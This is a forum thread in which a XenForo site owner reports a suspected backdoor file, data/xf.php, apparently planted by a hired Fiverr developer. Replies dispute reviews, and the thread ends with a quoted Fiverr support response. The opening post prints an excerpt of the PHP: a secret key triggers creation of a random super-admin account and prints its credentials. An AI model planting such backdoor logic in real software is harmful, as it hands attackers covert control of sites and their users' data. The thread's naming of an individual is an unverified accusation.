XF 2.2 xenforo developer may have added an exploit file

[MR X]

so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.

 

[Alpha1]

Let me explain the logic: we made a deal here on XenForo. I did some small work for him, and then he gave me a review. I never forced him to write a review—why would I? I have no account on fiverr lol

Is it your common practice to pay people (with free software, etc) to post a positive reviews on xenforo.com ?

 

[pvpers]

Is it your common practice to pay people (with free software, etc) to post a positive reviews on xenforo.com ?

The OP left a review for the small job that ForumSolution completed. The review was provided once the client was satisfied, just as ForumSolution mentioned.

I have also worked with forumsolution before and that I wrote my positive review of my own free will.

 

[Forsaken]

Bad link no result.

Added the actual archive link, which if you go to one of the last pages has the post in question.

 

[MR X]

Let me explain the logic: we made a deal here on XenForo. I did some small work for him of course paid he was happy so then he gave me a review just like a normal client. I never forced him to write a review—why would I? I have no account on fiverr lol

my words came off wrong,

forumsolution is not the same user and did not force me, xenbulletins (the bad actor) is the one that forced me to make a review.

 

[MR X]

Why don't you write a negative review on Fiverr explaining what he did and, most importantly, report him to Fiverr?
He's done something very serious and will do it to everyone! Both new and, especially, existing buyers need to be warned.

i did i am waiting for the verdict before i make a review on it (if he doesnt get banned)

 

[MR X]

this is what an escalated support ticket staff member said

Spoiler: response.

Thank you for providing all the detailed evidence and for your continued patience as we work through this matter.

I’m Bo from Fiverr Customer Support, and I want to assure you that we take this situation very seriously. First, I’d like to acknowledge the frustration and concern this issue has caused, especially given the serious nature of the breach you’ve outlined.

From the information you’ve shared, it’s clear that the file found on your server (/data/xf.php) was a deliberate malicious backdoor, which is in violation of Fiverr's terms and compromises the trust clients place in our platform. The evidence, including the Apache logs, chat logs, and the malicious code, strongly suggests that this freelancer, Fahad Ashraf (also known as XenAddons and xenbulletins), is directly responsible for placing the backdoor and engaging in malicious behavior.

We will be closely reviewing the details you've provided, including the information about Fahad's previous ban from the XenForo marketplace, complaints from other clients, and the false claims regarding his identity. It's deeply concerning that he encouraged off-platform payments and misrepresented himself, which clearly violates Fiverr’s policies.

I want to assure you that we are investigating this thoroughly and will take appropriate action if we find violations of Fiverr's Terms of Service. This includes possible penalties for the freelancer and steps to ensure that no other Fiverr clients are exposed to similar risks in the future. Rest assured, this is a high-priority case, and we will escalate this to the relevant teams for further review.

As for your refund request, I do understand the circumstances here, but given that the order was marked as completed in September 2024, the typical cancellation policy may not apply. However, I will forward your request to the relevant team for further consideration and to determine if any exceptions can be made in this specific case.

In the meantime, please feel free to provide any additional information or clarification, and we will continue to support you as we move forward with this investigation.

Thank you again for bringing this matter to our attention. We are committed to ensuring the safety and integrity of Fiverr’s platform, and your feedback is invaluable in helping us maintain that standard.

Best regards,